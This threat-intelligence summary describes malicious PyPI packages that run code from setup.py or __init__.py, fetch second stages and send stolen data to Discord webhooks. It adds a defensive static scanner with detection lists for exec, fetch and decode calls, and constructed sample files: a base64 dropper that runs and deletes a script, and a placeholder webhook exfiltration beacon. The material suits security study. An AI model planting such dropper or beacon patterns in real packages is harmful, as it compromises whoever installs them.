More Supply Chain Attacks via Malicious Python Packages | FortiGuard Labs

FortiGuard Labs identified 30+ previously unreported ("zero-day") malicious PyPI packages in a short window from late March to late April, grouped below into nine sets by behaviour. In most sets the malicious code sits in setup.py, so it runs when pip builds the source distribution at install time; in one set it sits in __init__.py, so it runs on first import instead. The code downloads second stages from remote URLs, decodes embedded payloads before writing and running them, and exfiltrates stolen data to Discord webhooks.
Hashtags: #tls-bypass #zproxy #stripe-client #stripepy #proxycpz #pycolorstrex #pyproxyx #colored-fidget #async-box #seleniumunclickable #pyobfexecute #compilecls #randgenlib #aietelegram #social-scrapper #quick-telegram-sender #social-scrappers #tiktok-phone-cheker #roblopython #pycalculate #BlackCap-Grabber-NoDualHook #DiscordWebhook #GitHub #BlackCap #PythonPackageIndex

Keypoints

  • Fortinet reports 30+ zero-day attacks in PyPI packages discovered between late March and late April through continuous monitoring of the open-source ecosystem.
  • Set 1 (tls-bypass, zproxy, stripe-client, stripepy, proxycpz, pycolorstrex, pyproxyx, colored-fidget) uses setup.py to execute a Python script that connects to a potentially malicious URL.
  • Set 2 (ailzyn1tr0, oauth20-api, bogdi) steals information (credit cards, wallets, account logins) and sends it out via a Discord webhook.
  • Set 3 (async-box) downloads a zip archive to a directory chosen by Python version, extracts it, runs a script inside, and then removes the directory to cover its tracks.
  • Set 4 (seleniumunclickable) connects to a URL to download and run a potentially malicious script.
  • Set 5 (pyobfexecute) carries an encoded blob that, once decoded, is written to disk as a Python script, executed, and then deleted.
  • Set 6 (compilecls, randgenlib, pipcoloringlibary, pipcoloringliberyV2, pythoncolourlibraryV1) includes a GitHub link to the BlackCap-Grabber-NoDualHook grabber and carries VM/sandbox-evasion code in __init__.py, so it runs on import rather than at install.
  • Set 7 (aietelegram, social-scapper, quick-telegram-sender, libidreq, setnetwork, tg-bulk-sender, social-scrappers, tiktok-phone-cheker, cloud-client, cloudfix) decodes embedded data to create and run an executable that exfiltrates data.
  • Set 8 (roblopython) decodes a string to recover a URL, fetches what is most likely an executable from it, writes it to disk and runs it.
  • Set 9 (pycalculate) uses multi-layer obfuscation; the final decoded stage drops a script named WindowsDefender.py, and a reference to a file-sharing source hints at the next stage it intends to fetch and execute.
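The behaviours listed above (fetch-and-run, decode-then-write-then-execute, delete-after-use, Discord webhook exfiltration, code hidden in __init__.py) can be triaged statically before a package is ever installed. The scanner below is an added example written for this page, not FortiGuard Labs code: it parses setup.py / __init__.py with Python's `ast` module and never executes anything, flags calls that match each behaviour, and reports a file as suspicious when an execution sink is paired with a network fetch or a decode step, or when a webhook URL is embedded. The three sample files are constructed for the example (the "payload" is a base64-encoded print statement) and are not taken from the packages above; the callee name lists and the scoring rule are this example's own choices.

```python
"""Static triage of setup.py / __init__.py for install-time and import-time
malicious behaviour. Added example, not FortiGuard Labs code. Uses ast only,
so the file under review is parsed and never run."""
import ast
import os
import re

# Suffix-matched callee names: "urlopen" also matches urllib.request.urlopen,
# "b64decode" matches base64.b64decode, and so on. Dict.get() does not match
# "requests.get" because the suffix check requires the "requests." prefix.
NETWORK = {"urlopen", "urlretrieve", "requests.get", "requests.post", "requests.Session",
           "socket.socket", "HTTPSConnection", "HTTPConnection"}
EXEC = {"exec", "eval", "os.system", "os.popen", "os.startfile", "subprocess.Popen",
        "subprocess.call", "subprocess.run", "subprocess.check_output", "subprocess.check_call"}
DECODE = {"b64decode", "b32decode", "b16decode", "a85decode", "unhexlify", "decompress",
          "marshal.loads", "codecs.decode"}
CLEANUP = {"os.remove", "os.unlink", "shutil.rmtree"}
CATEGORIES = {"network": NETWORK, "exec": EXEC, "decode": DECODE, "cleanup": CLEANUP}
# Discord webhook URLs, the exfiltration channel used by several of the sets above.
WEBHOOK_RE = re.compile(r"https?://(?:\w+\.)?discord(?:app)?\.com/api/webhooks/\S+", re.I)


def _dotted(node):
    """Return 'pkg.mod.attr' for a Name/Attribute chain, '' for anything else."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    return ""


def _matches(callee, names):
    return any(callee == n or callee.endswith("." + n) for n in names)


class _Finder(ast.NodeVisitor):
    def __init__(self):
        self.findings = {k: [] for k in (*CATEGORIES, "webhook", "filewrite")}

    def visit_Call(self, node):
        callee = _dotted(node.func)
        for cat, names in CATEGORIES.items():
            if _matches(callee, names):
                self.findings[cat].append((node.lineno, callee))
        # open(path, "w"/"wb"/"a"/"x") is how a decoded payload gets dropped to disk.
        if callee == "open":
            mode = None
            if len(node.args) > 1 and isinstance(node.args[1], ast.Constant):
                mode = node.args[1].value
            for kw in node.keywords:
                if kw.arg == "mode" and isinstance(kw.value, ast.Constant):
                    mode = kw.value.value
            if isinstance(mode, str) and any(c in mode for c in "wax"):
                self.findings["filewrite"].append((node.lineno, mode))
        self.generic_visit(node)

    def visit_Constant(self, node):
        if isinstance(node.value, str) and WEBHOOK_RE.search(node.value):
            self.findings["webhook"].append((node.lineno, node.value))


def scan_source(src, filename="setup.py"):
    """Classify one file's source text. Scoring rule (this example's choice):
    suspicious when an exec sink is fed by a fetch or a decode, or a webhook is present."""
    finder = _Finder()
    finder.visit(ast.parse(src, filename=filename))
    f = finder.findings
    suspicious = bool(f["webhook"]) or (bool(f["exec"]) and bool(f["network"] or f["decode"]))
    return {"file": filename, "findings": f, "suspicious": suspicious}


def scan_package_dir(root):
    """Walk an unpacked sdist or wheel. setup.py runs at install time and
    __init__.py at import time, which is where the sets above hide their code."""
    reports = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name in ("setup.py", "__init__.py"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    reports.append(scan_source(fh.read(), path))
    return reports


# Constructed samples for the example (not from the packages above). The base64
# string decodes to print("hi"); the scanner parses these and never runs them.
BENIGN_SETUP = '''
from setuptools import setup
setup(name="demo", version="1.0", packages=["demo"])
'''

DROPPER_SETUP = '''
import base64, os
from setuptools import setup
data = base64.b64decode(b"cHJpbnQoImhpIik=")
with open("stage2.py", "wb") as fh:
    fh.write(data)
os.system("python stage2.py")
os.remove("stage2.py")
setup(name="demo", version="1.0")
'''

WEBHOOK_INIT = '''
import requests
HOOK = "https://discord.com/api/webhooks/000000000000000000/placeholder"
def _beacon(info):
    requests.post(HOOK, json={"content": info})
'''

if __name__ == "__main__":
    for label, src, fn in (("benign", BENIGN_SETUP, "setup.py"),
                           ("dropper", DROPPER_SETUP, "setup.py"),
                           ("webhook", WEBHOOK_INIT, "__init__.py")):
        r = scan_source(src, fn)
        print(label, "suspicious" if r["suspicious"] else "clean", r["findings"])
```

Run `scan_package_dir()` on the directory left by `pip download --no-deps --no-binary :all: <pkg> -d ./review` after unpacking the archive, before anything is installed; installing an sdist is what triggers setup.py, and a wheel avoids that step but not the __init__.py case. Matching on callee names is a first pass only: a sample that builds the call through `getattr(__import__("os"), "system")` or that hides the exec chain behind a further decode layer (Set 9 style) will not match, so treat a clean result as "nothing obvious", not as a clean bill.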

MITRE Techniques

  • [T1195.002] Supply Chain Compromise: Compromise Software Supply Chain – The delivery vector is the Python Package Index itself; the code runs when pip builds the source distribution (setup.py) or, for Set 6, when the module is first imported (__init__.py).
  • [T1105] Ingress Tool Transfer – setup.py downloads and runs payloads or scripts from remote URLs (Sets 1, 3, 4 and 8). “the setup.py file in these packages tries to download a zip file to a directory (depending on the Python version), extract its contents, run a script contained in the zip file, and then remove its directory.”
  • [T1059.006] Command and Scripting Interpreter: Python – Every set executes as Python at install or import time, and several write a second-stage Python script to disk and run it. “the malicious code is found in __init__.py”
  • [T1027] Obfuscated Files and Information and [T1140] Deobfuscate/Decode Files or Information – Payloads are embedded as encoded strings and decoded at run time, in Set 9 through several layers. “Its setup.py file tries to execute the encoded data shown in Figure 5.”
  • [T1567] Exfiltration Over Web Service – Stolen data (credit cards, wallets, account logins, cookies) is posted to Discord webhooks (Sets 2 and 7), and Set 6 links to the BlackCap-Grabber-NoDualHook grabber. “The setup.py file in these packages tries to steal information, such as credit cards, wallets, account logins, etc. using a Discord webhook.”
  • [T1497] Virtualization/Sandbox Evasion – Set 6 checks for VM and sandbox environments before running. “bypassing VM machines, hiding itself, and injection techniques, etc.”
  • [T1055] Process Injection – The only support is that same generic mention of “injection techniques” in Set 6; the page does not show which injection method is used, so treat this mapping as tentative.
  • [T1070.004] Indicator Removal: File Deletion – Sets 3 and 5 delete the extracted directory or the dropped script after it has executed.

Indicators of Compromise

  • [File Hash] MD5 – ffb2b2e714229f281add91aca0d57dcf, d4c635f97b6564b904803fc2aabbaed8 and 2 more hashes
  • [File Hash] MD5 – 89db7b4665cff163931777f091f3b8f5, 3330f0addf70da913f2612a1f4160966 and other hashes
  • [URL] Malicious URLs (defanged) – hxxps://paste.website/p/400c3e4b-a59b-4598-a199-75e848aeaae3.txt, hxxps://raw.githubusercontent.com/KSCHdsc/BlackCap-Inject/main/index.js
  • [File Name] – setup.py inside the tls-bypass-1.0 and zproxy-1.0 source distributions

Read more: https://www.fortinet.com/blog/threat-research/more-supply-chain-attacks-via-malicious-python-packages